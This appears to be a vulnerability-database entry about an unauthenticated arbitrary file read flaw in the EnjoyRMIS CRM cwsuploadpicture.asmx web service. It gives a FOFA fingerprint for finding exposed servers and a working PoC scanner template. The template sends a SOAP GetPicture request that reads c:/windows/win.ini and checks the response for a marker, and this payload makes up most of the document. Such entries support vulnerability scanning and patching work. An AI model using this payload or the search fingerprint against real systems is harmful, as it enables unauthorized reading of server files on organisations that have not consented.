enjoycrm-cwsuploadpicture-fileread: EnjoyRMIS CRM cwsuploadpicture.asmx Arbitrary File Read

日期: 2025-09-01 | 影响软件: EnjoyRMIS CRM | POC: 已公开

漏洞描述

EnjoyRMIS CRM system has a file read vulnerability in cwsuploadpicture.asmx interface. Unauthenticated attackers can read arbitrary system files through this vulnerability. FOFA: body="/ClientBin/slEnjoy.App.xap"

PoC代码[已公开]

id: enjoycrm-cwsuploadpicture-fileread
info:
  name: EnjoyRMIS CRM cwsuploadpicture.asmx Arbitrary File Read
  author: ZacharyZcR
  severity: high
  verified: true
  description: |
    EnjoyRMIS CRM system has a file read vulnerability in cwsuploadpicture.asmx interface.
    Unauthenticated attackers can read arbitrary system files through this vulnerability.
    FOFA: body="/ClientBin/slEnjoy.App.xap"
  reference:
    - https://github.com/wy876/POC/blob/main/%E6%98%82%E6%8D%B7ERP/%E6%98%82%E6%8D%B7CRM%E7%B3%BB%E7%BB%9Fcwsuploadpicture.asmx%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  tags: enjoycrm,lfi,fileread
  created: 2024/12/30

rules:
  r0:
    request:
      method: POST
      path: /enjoyRMIS_WS/WS/Common/cwsuploadpicture.asmx
      headers:
        Content-Type: text/xml; charset=utf-8
        SOAPAction: "http://tempuri.org/GetPicture"
      body: |
        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <GetPicture xmlns="http://tempuri.org/">
              <sFullFileName>c:/windows/win.ini</sFullFileName>
            </GetPicture>
          </soap:Body>
        </soap:Envelope>
    expression: response.status == 200 && response.body.bcontains(b'OyBmb3IgMTYtYml0IGFwcC')
expression: r0()

相关漏洞推荐